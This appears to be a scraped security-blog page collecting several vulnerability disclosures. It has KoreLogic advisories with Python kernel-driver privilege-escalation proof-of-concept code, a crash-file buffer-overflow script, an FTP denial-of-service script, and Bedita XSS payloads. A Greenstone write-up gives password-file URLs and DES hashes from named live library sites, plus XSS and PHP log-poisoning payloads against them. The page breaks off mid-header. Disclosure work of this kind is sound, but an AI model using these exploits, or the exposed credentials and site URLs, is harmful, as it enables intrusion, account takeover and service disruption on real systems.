KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write
Privilege Escalation
Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-004
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt
1. Vulnerability Details
Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: XGI VGA Display Manager
Affected Version: 6.14.10.1090
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-5466
2. Vulnerability Description
A vulnerability within the xrvkp module allows an attacker
to inject memory they control into an arbitrary location they
define. This vulnerability can be used to overwrite function
pointers in HalDispatchTable resulting in an elevation of
privilege.
3. Technical Description
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
*******************************************************************************
*
*
* Bugcheck Analysis
*
*
*
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 50, {ffff0000, 1, 804f3b76, 0}
Probably caused by : xrvkp.sys ( xrvkp+6ec )
Followup: MachineOwner
---------
kd> kn
Call stack: # ChildEBP RetAddr
00 f63fd9a0 8051cc7f nt!KeBugCheckEx+0x1b
01 f63fda00 805405d4 nt!MmAccessFault+0x8e7
02 f63fda00 804f3b76 nt!KiTrap0E+0xcc
03 f63fdad0 804fdaf1 nt!IopCompleteRequest+0x92
04 f63fdb20 806d3c35 nt!KiDeliverApc+0xb3
05 f63fdb20 806d3861 hal!HalpApcInterrupt+0xc5
06 f63fdba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11
07 f63fdbc8 804f07e4 nt!KeInsertQueueApc+0x4b
08 f63fdbfc f7b136ec nt!IopfCompleteRequest+0x1d8
09 f63fdc34 804ee129 xrvkp+0x6ec
0a f63fdc44 80574e56 nt!IopfCallDriver+0x31
0b f63fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
0c f63fdd00 8056e57c nt!IopXxxControlFile+0x5e7
0d f63fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0e f63fdd34 7c90e514 nt!KiFastCallEntry+0xf8
0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
15 0021f6c0 1e07bd9c _ctypes+0x54d8
16 00000000 00000000 python27!PyObject_Call+0x4c
4. Mitigation and Remediation Recommendation
No response from vendor; no remediation available.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2015.05.14 - Initial contact; requested security contact.
2015.05.18 - Second contact attempt.
2015.05.25 - Third contact attempt.
2015.07.02 - KoreLogic requests CVE from Mitre.
2015.07.10 - Mitre issues CVE-2015-5466.
2015.07.28 - 45 business days have elapsed since KoreLogic last
attempted to contact SiS without a response.
2015.09.01 - Public disclosure.
7. Proof of Concept
from sys import exit
from ctypes import *
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "xgikp"
code = 0x96002404
inlen = 0xe6b6
outlen = 0x0
inbuf = 0x1
outbuf = 0xffff0000
inBufMem = "\x90"*inlen
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0)))
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,outbuf,outlen)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149168
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege
Escalation
Title: SiS Windows VGA Display Manager Multiple Privilege Escalation
Advisory ID: KL-001-2015-003
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-003.txt
1. Vulnerability Details
Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: Windows VGA Display Manager
Affected Version: 6.14.10.3930
Platform: Microsoft Windows 7 (x86), Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-5465
2. Vulnerability Description
Vulnerabilities within the srvkp module allows an attacker
to inject memory they control into an arbitrary location
they define or cause memory corruption. IOCTL request codes
0x96002400 and 0x96002404 have been demonstrated to trigger
these vulnerabilities. These vulnerabilities can be used
to obtain control of code flow in a privileged process and
ultimately be used to escalate the privilege of an attacker.
3. Technical Description
Example against Windows XP:
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86
compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
************************************************************************
*******
*
*
* Bugcheck Analysis
*
*
*
************************************************************************
*******
Use !analyze -v to get detailed debugging information.
BugCheck 50, {ffff0000, 1, 804f3b76, 0}
Probably caused by : srvkp.sys ( srvkp+3329 )
Followup: MachineOwner
---------
kd> kn
Call stack: # ChildEBP RetAddr
00 f6a529a0 8051cc7f nt!KeBugCheckEx+0x1b
01 f6a52a00 805405d4 nt!MmAccessFault+0x8e7
02 f6a52a00 804f3b76 nt!KiTrap0E+0xcc
03 f6a52ad0 804fdaf1 nt!IopCompleteRequest+0x92
04 f6a52b20 806d3c35 nt!KiDeliverApc+0xb3
05 f6a52b20 806d3861 hal!HalpApcInterrupt+0xc5
06 f6a52ba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11
07 f6a52bc8 804f07e4 nt!KeInsertQueueApc+0x4b
08 f6a52bfc f7910329 nt!IopfCompleteRequest+0x1d8
09 f6a52c34 804ee129 srvkp+0x3329
0a f6a52c44 80574e56 nt!IopfCallDriver+0x31
0b f6a52c58 80575d11 nt!IopSynchronousServiceTail+0x70
0c f6a52d00 8056e57c nt!IopXxxControlFile+0x5e7
0d f6a52d34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0e f6a52d34 7c90e514 nt!KiFastCallEntry+0xf8
0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
15 0021f6c0 1e07bd9c _ctypes+0x54d8
16 00000000 00000000 python27!PyObject_Call+0x4c
Example against Windows 7:
Microsoft (R) Windows Debugger Version 6.2.9200.20512 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Windows\MEMORY.DMP]
Kernel Summary Dump File: Only kernel address space is available
Symbol search path is: *** Invalid ***
************************************************************************
****
* Symbol loading may be unreliable without a symbol search path.
*
* Use .symfix to have the debugger choose a symbol path.
*
* After setting your symbol path, use .reload to refresh symbol
locations. *
************************************************************************
****
Executable search path is:
*******************************************************************
**
* Symbols can not be loaded because symbol path is not initialized.
*
*
*
* The Symbol Path can be set by:
*
* using the _NT_SYMBOL_PATH environment variable.
*
* using the -y <symbol_path> argument when starting the debugger.
*
* using .sympath and .sympath+
*
*******************************************************************
**
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for ntkrpamp.exe -
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatib
le
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850
Machine Name:
Kernel base = 0x82a12000 PsLoadedModuleList = 0x82b5c850
Debug session time: Mon Aug 17 14:36:36.286 2015 (UTC - 7:00)
System Uptime: 0 days 11:46:55.313
*******************************************************************
**
* Symbols can not be loaded because symbol path is not initialized.
*
*
*
* The Symbol Path can be set by:
*
* using the _NT_SYMBOL_PATH environment variable.
*
* using the -y <symbol_path> argument when starting the debugger.
*
* using .sympath and .sympath+
*
*******************************************************************
**
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for ntkrpamp.exe -
Loading Kernel Symbols
...............................................................
................................................................
.....................................
Loading User Symbols
PEB is paged out (Peb.Ldr = 7ffd400c). Type ".hh dbgerr001" for
details
Loading unloaded module list
..............................
************************************************************************
*******
*
*
* Bugcheck Analysis
*
*
*
************************************************************************
*******
Use !analyze -v to get detailed debugging information.
BugCheck 8E, {c0000005, ac08f2fa, 93df4a50, 0}
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
...
...
...
Followup: MachineOwner
---------
kd> .symfix;.reload
Loading Kernel Symbols
...............................................................
................................................................
.....................................
Loading User Symbols
PEB is paged out (Peb.Ldr = 7ffd400c). Type ".hh dbgerr001" for
details
Loading unloaded module list
..............................
kd> !analyze -v
************************************************************************
*******
*
*
* Bugcheck Analysis
*
*
*
************************************************************************
*******
KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck. Usually the exception address
pinpoints
the driver/function that caused the problem. Always note this
address
as well as the link date of the driver/image that contains this
address.
Some common problems are exception code 0x80000003. This means a
hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should
never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint
is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: ac08f2fa, The address that the exception occurred at
Arg3: 93df4a50, Trap Frame
Arg4: 00000000
Debugging Details:
------------------
*** ERROR: Module load completed but symbols could not be loaded
for srvkp.sys
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at
0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
FAULTING_IP:
srvkp+32fa
ac08f2fa 8b4804 mov ecx,dword ptr [eax+4]
TRAP_FRAME: 93df4a50 -- (.trap 0xffffffff93df4a50)
ErrCode = 00000000
eax=00000000 ebx=00000000 ecx=00000000 edx=93df4ae4 esi=85644140
edi=d68fc588
eip=ac08f2fa esp=93df4ac4 ebp=93df4afc iopl=0 nv up ei pl
zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010246
srvkp+0x32fa:
ac08f2fa 8b4804 mov ecx,dword ptr [eax+4]
ds:0023:00000004=????????
Resetting default scope
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x8E
PROCESS_NAME: python.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 82ac708c to 82af0f20
STACK_TEXT:
93df45c4 82ac708c 0000008e c0000005 ac08f2fa nt!KeBugCheckEx+0x1e
93df49e0 82a50dd6 93df49fc 00000000 93df4a50
nt!KiDispatchException+0x1ac
93df4a48 82a50d8a 93df4afc ac08f2fa badb0d00
nt!CommonDispatchException+0x4a
93df4afc 82a49593 85644140 869fb048 869fb048 nt!KiExceptionExit+0x1
92
93df4b14 82c3d99f d68fc588 869fb048 869fb0b8 nt!IofCallDriver+0x63
93df4b34 82c40b71 85644140 d68fc588 00000000
nt!IopSynchronousServiceTail+0x1f8
93df4bd0 82c873f4 85644140 869fb048 00000000
nt!IopXxxControlFile+0x6aa
93df4c04 82a501ea 00000088 00000000 00000000
nt!NtDeviceIoControlFile+0x2a
93df4c04 77d270b4 00000088 00000000 00000000 nt!KiFastCallEntry+0x1
2a
WARNING: Frame IP not in any known module. Following frames may
be wrong.
0021f3dc 00000000 00000000 00000000 00000000 0x77d270b4
STACK_COMMAND: kb
FOLLOWUP_IP:
srvkp+32fa
ac08f2fa 8b4804 mov ecx,dword ptr [eax+4]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: srvkp+32fa
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: srvkp
IMAGE_NAME: srvkp.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 4cc65532
FAILURE_BUCKET_ID: 0x8E_srvkp+32fa
BUCKET_ID: 0x8E_srvkp+32fa
Followup: MachineOwner
---------
4. Mitigation and Remediation Recommendation
No response from vendor; no remediation available.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2015.05.14 - Initial contact; requested security contact.
2015.05.18 - Second contact attempt.
2015.05.25 - Third contact attempt.
2015.07.02 - KoreLogic requests CVE from Mitre.
2015.07.10 - Mitre issues CVE-2015-5465.
2015.07.28 - 45 business days have elapsed since KoreLogic last
attempted to contact SiS without a response.
2015.09.01 - Public disclosure.
7. Proof of Concept
# Arbitrary Write (Windows XP)
from sys import exit
from ctypes import *
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "siskp"
code = 0x96002404
inlen = 0xe6b6
outlen = 0x0
inbuf = 0x1
outbuf = 0xffff0000
inBufMem = "\x90"*inlen
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x
1000|0x2000,0x40)
WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0)))
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,o
utbuf,outlen)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
and
# Null Pointer Dereference (Windows XP/7)
from sys import exit
from ctypes import *
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "siskp"
code = 0x96002400
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,0x0,0x0
,0x0)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Poli
cy.v1.0.txt
********************************************************************************************
# Exploit Title: Mpxplay Multimedia Commander Stack-based BOF
# Date: 9/1/2015
# Exploit Author: Un_N0n
# Software Link: http://sourceforge.net/p/mpxplay/activity?source=project_activity
# Version: V2.00a
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'mpxp_mmc.exe'.
2- Browser Crash.m3u in audio player.
~ Software will Crash.
[Code to produce crash.txt]:
junk = "A"*66666
file = open("CRASH.m3u",'w')
file.write(junk)
file.close()
**********************************************************************************************
# Exploit Title: Rocoh DC FTP (SR10) v1.1.0.8 DoS
# Date: 8/31/2015
# Exploit Author: j2x6
# Vendor Homepage: http://www.ricoh-imaging.co.jp/
# Software Link: http://www.ricoh-imaging.co.jp/english/r_dc/download/sw/win/07.html
# Version: 1.1.0.8
# Tested on: Windows 7
# Offset for Buffer Overflow attempt: 495
#!/usr/bin/python
import socket
badthing= "A" * 81300
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.45.11',21))
s.send(badthing+'\r\n')
s.send(badthing+'\r\n')
s.send('\r\n')
s.send('EXIT\r\n')
s.close()
########################################################################################
# Title: Bedita 3.5.1 XSS vulnerabilites
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications
########################################################################################
===================
Introduction:
===================
BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.
(http://en.wikipedia.org/wiki/BEdita)
########################################################################################
===================
Report Timeline:
===================
2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release
########################################################################################
===================
Technical details:
===================
Persistent XSS:
===============
Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.
Exploits Examples:
1)cfg[projectName] parameter:
POST http://127.0.0.1/bedita/index.php/admin/saveConfig
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]
2) data[stats_provider_url] parameter:
POST http://127.0.0.1/bedita/index.php/areas/saveArea
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]
3) data[description] parameter:
POST http://127.0.0.1/bedita/index.php/areas/saveSection
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
Connection: keep-alive
[...]data%5Bdescription%5D=</textarea><script>alert(123)</script>[...]
########################################################################################
source: https://www.securityfocus.com/bid/56662/info
Greenstone is prone to the following security vulnerabilities:
1. A file-disclosure vulnerability
2. A cross-site scripting vulnerability
3. A security weakness
4. A security-bypass vulnerability
Attackers can exploit these issues to view local files, bypass certain security restriction, steal cookie-based authentication, or execute arbitrary scripts in the context of the browser.
=================Let's Roll============================
Password file disclosure:
http://greenstone.flib.sci.am/gsdl/etc/users.gdb
http://greenstone.flib.sci.am/gsdl/etc/key.gdb
http://greenstone.martinique.univ-ag.fr/gsdl/etc/users.db
http://greenstone.martinique.univ-ag.fr/gsdl/etc/key.db
Example:
(P.S Password encryption: Des (Unix))
===================== Reproduce =====================
$ wget http://greenstone.flib.sci.am/gsdl/etc/users.gdb && cat users.gdb
--2012-11-22 17:04:39-- http://greenstone.flib.sci.am/gsdl/etc/users.gdb
Resolving greenstone.flib.sci.am (greenstone.flib.sci.am)... 93.187.162.197
Connecting to greenstone.flib.sci.am (greenstone.flib.sci.am)|93.187.162.197|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12926 (13K) [text/plain]
Saving to: `users.gdb'
100%[==========================================>] 12,926 31.8K/s in 0.4s
2012-11-22 17:04:40 (31.8 KB/s) - `users.gdb' saved [12926/12926]
.......Some junk snip........
... admin<comment>created at install time
<enabled>true
<groups>administrator,colbuilder,all-collections-editor
<password>TpM5gyFpfCsLc
<username>admindemo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
<enabled>true
<groups>demo
<password>Tpp90HTz/jz9w
<username>demotatevik<comment>
<enabled>true
<groups>all-collections-editor
<password>Tpyq8s1oUIioc
<username>tatevik
azgayin<comment>
<enabled>true
<groups>all-collections-editor
<password>Tp53Vsj1qM4cE
<username>azgayin
demo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
<enabled>true
<groups>demo
<password>TpzWMQXVfKFvw
<username>demo
========================= END OF users.gbd============================
Known salt issuse (because this application uses "setpasswd" utility via
hardcoded salt=>: Tp)
(Especially on windows systems)
================================BEGIN================================
/**********************************************************************
*
* setpasswd.cpp --
* Copyright (C) 2000 The New Zealand Digital Library Project
*
* A component of the Greenstone digital library software
* from the New Zealand Digital Library Project at the
* University of Waikato, New Zealand.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
*********************************************************************/
// setpasswd is a windows application that can be used to encrypt a password
// and write it (along with its corresponding username) to a gdbm database.
// it handles writing to the gdbm database itself to avoid having to call
// the txt2db console application (and therefore avoiding the console
// window popping up when called from another windows application).
// note that setpasswd does no checking to make sure that any of it's
// input arguments are valid (or even reasonable) values.
// this program should be compiled into a binary called setpw.exe (to be
// short enough not to mess with 16 bit Windows platforms).
// usage:
// setpw -u username -p password -o output_gdbm_file
#include "text_t.h"
#include "crypt.h"
#include "autoconf.h"
#include "systems.h"
#include "gdbmconst.h"
#include "gdbm.h"
#include <windows.h>
text_t username;
text_t password;
text_t output_gdbm_file;
bool parse_cmdline (LPSTR cmdline) {
bool in_quote = false;
text_t arg;
text_tarray args;
unsigned char *c = (unsigned char *)cmdline;
while (*c != '\0') {
if (*c == '"') {
if (!in_quote) {
in_quote = true;
} else {
in_quote = false;
if (!arg.empty()) args.push_back (arg);
arg.clear();
}
} else if (*c == ' ' && !in_quote) {
if (!arg.empty()) args.push_back (arg);
arg.clear();
} else {
arg.push_back (*c);
}
++c;
}
if (!arg.empty()) args.push_back (arg);
text_tarray::const_iterator here = args.begin();
text_tarray::const_iterator end = args.end();
while (here != end) {
if (*here == "-u" && (++here != end)) username = *here;
else if (*here == "-p" && (++here != end)) password = *here;
else if (*here == "-o" && (++here != end)) output_gdbm_file = *here;
if (here != end) ++here;
}
if (username.empty() || password.empty() || output_gdbm_file.empty()) {
MessageBox (NULL, "Usage:\n setpasswd -u username -p password -o output_gdbm_file",
"setpasswd failed", MB_OK);
return false;
}
return true;
}
text_t crypt_text (const text_t &text) {
static const char *salt = "Tp";
text_t crypt_password;
if (text.empty()) return "";
// encrypt the password
char *text_cstr = text.getcstr();
if (text_cstr == NULL) return "";
crypt_password = crypt(text_cstr, salt);
delete []text_cstr;
return crypt_password;
}
bool add_to_db () {
int block_size = 0;
GDBM_FILE dbf;
char *dbname = output_gdbm_file.getcstr();
// open the database
int read_write = GDBM_WRCREAT;
dbf = gdbm_open (dbname, block_size, read_write, 00664, NULL, 1);
if (dbf == NULL) {
MessageBox (NULL, "gdbm_open failed\n", "setpasswd", MB_OK);
return false;
}
datum key_data;
key_data.dptr = username.getcstr();
if (key_data.dptr == NULL) {
MessageBox (NULL, "null key_data\n", "setpasswd", MB_OK);
return false;
}
key_data.dsize = strlen(key_data.dptr);
text_t value = "<comment>\n";
value += "<enabled>true\n";
value += "<groups>administrator,colbuilder\n";
value += "<password>" + password + "\n";
value += "<username>" + username + "\n";
datum value_data;
value_data.dptr = value.getcstr();
if (value_data.dptr == NULL) {
MessageBox (NULL, "null value_data\n", "setpasswd", MB_OK);
return false;
}
value_data.dsize = strlen(value_data.dptr);
// store the value
if (gdbm_store (dbf, key_data, value_data, GDBM_REPLACE) < 0) {
MessageBox (NULL, "gdbm_store failed\n", "setpasswd", MB_OK);
return false;
}
gdbm_close (dbf);
delete []key_data.dptr;
delete []value_data.dptr;
delete []dbname;
return true;
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow) {
// parse command line arguments
if (!parse_cmdline (lpCmdLine)) return 1;
// encrypt the password
password = crypt_text (password);
// append the password and username to database
add_to_db();
return 0;
}
============================================================
XSS:
site.tld/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=<script>alert("OwnEd");</script>
Demo:
http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E
http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E%20%3E%3E%20greenstone.flib.greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E
http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=%22%3E%3Cscript%3Ealert%28%22Again%20Owned%22%29;%3C/script%3E&pr=7&c=AkaStep
============================================================
Log forging:
http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223"%0D%0A%0D%0AWarning: Accepted connection from unknown host to local port: 22 root logged in%29%0D%0A%0D%0A" cmd.exe
http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223%0D%0A%0D%0AError%20D:\Program%20Files\Greenstone\%20directory%20owned?%29%0D%0A%0D%0A
Forged log: http://greenstone.unam.na/gsdl/etc/error.txt (CTRL+F and search for: host to local port: 22)
Example:
===================EXAMPLE OF =FORGED LOG====================
Error: the action "4?e="3"
Warning: Accepted connection from unknown host to local port: 22 root logged in) <==Fake entry for Panic system administrator))))))
" cmd.exe" could not be found.
================END OF FORGED LOG=============
Log File Poisoning: (Usefull for LFI)
www.bibliotecamuseodelamemoria.cl/gsdl/cgi-bin/library.cgi?e=4?e="%0d%0a<?php phpinfo();?>%0d%0a%00%00
Poisoned Log can be found in the following places:
site/gsdl/etc/error.txt
or
site/etc/error.txt (<=On Windows systems in ex i found it here)
Example of injected log:
==================================
http://greenstone.unam.na/gsdl/etc/error.txt
Error: the action "4?e="
<?php phpinfo();?>
.." could not be found.
==================================
******************** The End *******************
#!/usr/bin/perl -w
#-*- coding: utf-8 -*
#
#[+] Title: Viber Non-Printable Characters Handling Denial of Service Vulnerability
#[+] Product: Viber
#[+] Vendor: http://www.viber.com/en/
#[+] SoftWare Link : https://itunes.apple.com/app/viber-free-phone-calls/id382617920?mt=8
#[+] Vulnerable Version(s): Viber 4.2.0 on IOS 7.1.2
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
